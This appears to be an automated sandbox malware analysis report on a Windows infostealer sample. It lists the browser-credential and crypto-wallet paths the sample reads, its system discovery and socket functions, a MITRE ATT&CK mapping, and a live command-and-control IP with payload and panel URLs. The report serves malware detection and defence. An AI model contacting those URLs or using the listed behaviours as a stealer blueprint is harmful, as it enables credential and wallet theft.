Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: CwQQqCmqkY.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: CwQQqCmqkY.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe

Code function: 0_2_00007FF7F12B3E20 WSAStartup,WSACleanup,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,QueryPerformanceFrequency,

0_2_00007FF7F12B3E20

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe

Code function: 0_2_00007FF7F129D51C push rsp; ret

0_2_00007FF7F129D525

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File created: C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\miniwallet.bundle.js.LICENSE.txt			Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File created: C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\notification_fast.bundle.js.LICENSE.txt			Jump to behavior

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F132DDD8 wsprintfW,FindFirstFileW,wsprintfW,PathFindExtensionW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,wsprintfW,FindNextFileW,FindClose,	0_2_00007FF7F132DDD8
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F1330138 FindFirstFileW,CreateDirectoryW,CopyFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF7F1330138
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F13306C8 FindFirstFileW,CreateDirectoryW,CopyFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,	0_2_00007FF7F13306C8
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F13309A4 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,FindClose,	0_2_00007FF7F13309A4
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F1321B60 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF7F1321B60

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe

Code function: 0_2_00007FF7F132E23C GetSystemInfo,GlobalMemoryStatusEx,GetUserDefaultUILanguage,GetDesktopWindow,GetClientRect,GetUserNameA,GetComputerNameA,GetVersionExA,GetCurrentHwProfileA,GetModuleFileNameA,GetLocaleInfoEx,GetSystemFirmwareTable,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SetCurrentDirectoryW,CreateDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,CreateDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,CreateDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,GetSystemMetrics,CreateDirectoryW,SetCurrentDirectoryW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF7F132E23C

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache	Jump to behavior

Source: CwQQqCmqkY.exe, 00000000.00000002.2327500005.000001D1BDD64000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4Ua<~P

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe

Code function: 0_2_00007FF7F12FAB08 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF7F12FAB08

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe

0_2_00007FF7F12B3E20

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe

Code function: 0_2_00007FF7F1326144 GetProcessHeap,

0_2_00007FF7F1326144

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12FA760 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF7F12FA760
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12FAB08 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF7F12FAB08
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12FACE8 SetUnhandledExceptionFilter,	0_2_00007FF7F12FACE8
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F1302F3C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF7F1302F3C

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe

Code function: 0_2_00007FF7F132BED0 cpuid

0_2_00007FF7F132BED0

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: GetSystemInfo,GlobalMemoryStatusEx,GetUserDefaultUILanguage,GetDesktopWindow,GetClientRect,GetUserNameA,GetComputerNameA,GetVersionExA,GetCurrentHwProfileA,GetModuleFileNameA,GetLocaleInfoEx,GetSystemFirmwareTable,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SetCurrentDirectoryW,CreateDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,CreateDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,CreateDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,GetSystemMetrics,CreateDirectoryW,SetCurrentDirectoryW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF7F132E23C
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_00007FF7F13253E4
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00007FF7F13258A8
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: EnumSystemLocalesW,	0_2_00007FF7F1325740
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: EnumSystemLocalesW,	0_2_00007FF7F1325810
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: GetLocaleInfoW,	0_2_00007FF7F1325AF0
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00007FF7F1325C48
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: GetLocaleInfoW,	0_2_00007FF7F1325CF8
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00007FF7F1325E2C
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: EnumSystemLocalesW,	0_2_00007FF7F131BDB0
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: GetLocaleInfoW,	0_2_00007FF7F131C348

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe

Code function: 0_2_00007FF7F130AA9C GetSystemTimeAsFileTime,

0_2_00007FF7F130AA9C

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe

0_2_00007FF7F132E23C

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe

Code function: 0_2_00007FF7F132773C _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

0_2_00007FF7F132773C

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe

0_2_00007FF7F132E23C

Stealing of Sensitive Information

Yara detected MicroClip

Source: Yara match

File source: Process Memory Space: CwQQqCmqkY.exe PID: 4144, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ShaderCache	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\MEIPreload	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\hyphen-data	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\pnacl	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\BrowserMetrics	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\PKIMetadata	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\WidevineCdm	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\AutofillStates	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\GrShaderCache	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SafetyTips	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\RecoveryImproved	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\reports	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\OriginTrials	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crowd Deny	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\FileTypePolicies	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Safe Browsing	Jump to behavior
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe

File opened: C:\Users\user\AppData\Roaming\Exodus\

Jump to behavior

Remote Access Functionality

Yara detected MicroClip

Source: Yara match

File source: Process Memory Space: CwQQqCmqkY.exe PID: 4144, type: MEMORYSTR

Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12B7AC0 WSAGetLastError,htons,htons,WSAGetLastError,htons,htons,bind,htons,bind,WSAGetLastError,	0_2_00007FF7F12B7AC0
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12D1C72 bind,WSAGetLastError,	0_2_00007FF7F12D1C72
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12D1EF0 bind,WSAGetLastError,	0_2_00007FF7F12D1EF0
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12DE270 getsockname,WSAGetLastError,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons,	0_2_00007FF7F12DE270
Source: C:\Users\user\Desktop\CwQQqCmqkY.exe	Code function: 0_2_00007FF7F12C8BA0 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket,	0_2_00007FF7F12C8BA0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	1 Masquerading	1 OS Credential Dumping	2 System Time Discovery	1 Exploitation of Remote Services	12 Archive Collected Data	1 Data Obfuscation	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Deobfuscate/Decode Files or Information	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	2 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 System Owner/User Discovery	Distributed Component Object Model	Input Capture	1 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	1 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	34 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
CwQQqCmqkY.exe	26%	Virustotal		Browse
CwQQqCmqkY.exe	53%	ReversingLabs	Win64.Hacktool.SvcStealer
CwQQqCmqkY.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://185.81.68.147/gg.phps64	100%	Avira URL Cloud	phishing
http://185.81.68.147/gg.php	100%	Avira URL Cloud	phishing
http://185.81.68.147/psw.exe	100%	Avira URL Cloud	phishing
http://185.81.68.147/psw.exeDiamotrixGDU1CAMRFRsZKUklCBwfBgYIGDUVCQ4AEw==DiamotrixGDUFBBwXHRscGDUtAg	100%	Avira URL Cloud	phishing
http://185.81.68.147/gg.phpReflectiveLoader	100%	Avira URL Cloud	phishing
http://www.winimage.com/zLibDll1.3.1-wbr	0%	Avira URL Cloud	safe
http://185.81.68.147/gg.phpspace	100%	Avira URL Cloud	phishing

Name	Malicious	Antivirus Detection	Reputation
http://185.81.68.147/gg.php	true	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://curl.se/docs/hsts.html	CwQQqCmqkY.exe	false		high
https://curl.se/docs/alt-svc.html#	CwQQqCmqkY.exe	false		high
http://185.81.68.147/gg.phpspace	CwQQqCmqkY.exe, 00000000.00000002.2327500005.000001D1BDCFC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.147/psw.exeDiamotrixGDU1CAMRFRsZKUklCBwfBgYIGDUVCQ4AEw==DiamotrixGDUFBBwXHRscGDUtAg	CwQQqCmqkY.exe	false	Avira URL Cloud: phishing	unknown
https://curl.se/docs/http-cookies.html	CwQQqCmqkY.exe	false		high
https://curl.se/docs/hsts.html#	CwQQqCmqkY.exe	false		high
http://185.81.68.147/psw.exe	CwQQqCmqkY.exe, CwQQqCmqkY.exe, 00000000.00000002.2327500005.000001D1BDCFC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.winimage.com/zLibDll	CwQQqCmqkY.exe	false		high
https://curl.se/docs/http-cookies.html#	CwQQqCmqkY.exe	false		high
http://185.81.68.147/gg.phps64	CwQQqCmqkY.exe, 00000000.00000002.2327500005.000001D1BDCFC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://curl.se/docs/alt-svc.html	CwQQqCmqkY.exe	false		high
http://www.winimage.com/zLibDll1.3.1-wbr	CwQQqCmqkY.exe	false	Avira URL Cloud: safe	unknown
http://185.81.68.147/gg.phpReflectiveLoader	CwQQqCmqkY.exe	false	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.81.68.147	unknown	Finland		50108	KLNOPT-ASFI	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580848
Start date and time:	2024-12-26 12:03:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	CwQQqCmqkY.exe renamed because original name is a hash value
Original Sample Name:	1a477a5659d817b01a50f2a80cb1d76e.exe
Detection:	MAL
Classification:	mal96.troj.spyw.winEXE@1/38@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 74 Number of non-executed functions: 187
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.81.68.147	uFVgJVXaEU.exe	Get hash	malicious	RedLine	Browse	185.81.68.147/VzCAHn.php?2F409E82DCA61388941053
	m5804Te9Uw.exe	Get hash	malicious	RedLine	Browse	185.81.68.147/VzCAHn.php?443320E440F81953448019
	3Qv3xyyL5G.exe	Get hash	malicious	RedLine	Browse	185.81.68.147/VzCAHn.php?65D35BAB97073674480464
	K6qneGSDSB.exe	Get hash	malicious	Babadeda, RedLine	Browse	185.81.68.147/VzCAHn.php?616766F8886C145454191
	file.exe	Get hash	malicious	Amadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, Stealc	Browse	185.81.68.147/tizhyf/gate.php?232B06DEE822786254513
	mggoBrtk9t.exe	Get hash	malicious	Amadey, RedLine	Browse	185.81.68.147/7vhfjke3/index.php
	D72j5I83wU.dll	Get hash	malicious	Amadey	Browse	185.81.68.147/7vhfjke3/index.php
	D72j5I83wU.dll	Get hash	malicious	Amadey	Browse	185.81.68.147/7vhfjke3/index.php
	hoPazBDFG9.dll	Get hash	malicious	Amadey	Browse	185.81.68.147/7vhfjke3/index.php?wal=1
	tOuVwTJrau.exe	Get hash	malicious	Amadey	Browse	185.81.68.147/7vhfjke3/index.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
KLNOPT-ASFI	uFVgJVXaEU.exe	Get hash	malicious	RedLine	Browse	185.81.68.147
	m5804Te9Uw.exe	Get hash	malicious	RedLine	Browse	185.81.68.147
	3Qv3xyyL5G.exe	Get hash	malicious	RedLine	Browse	185.81.68.147
	K6qneGSDSB.exe	Get hash	malicious	Babadeda, RedLine	Browse	185.81.68.147
	file.exe	Get hash	malicious	Amadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, Stealc	Browse	185.81.68.147
	mggoBrtk9t.exe	Get hash	malicious	Amadey, RedLine	Browse	185.81.68.148
	D72j5I83wU.dll	Get hash	malicious	Amadey	Browse	185.81.68.148
	D72j5I83wU.dll	Get hash	malicious	Amadey	Browse	185.81.68.148
	hoPazBDFG9.dll	Get hash	malicious	Amadey	Browse	185.81.68.148
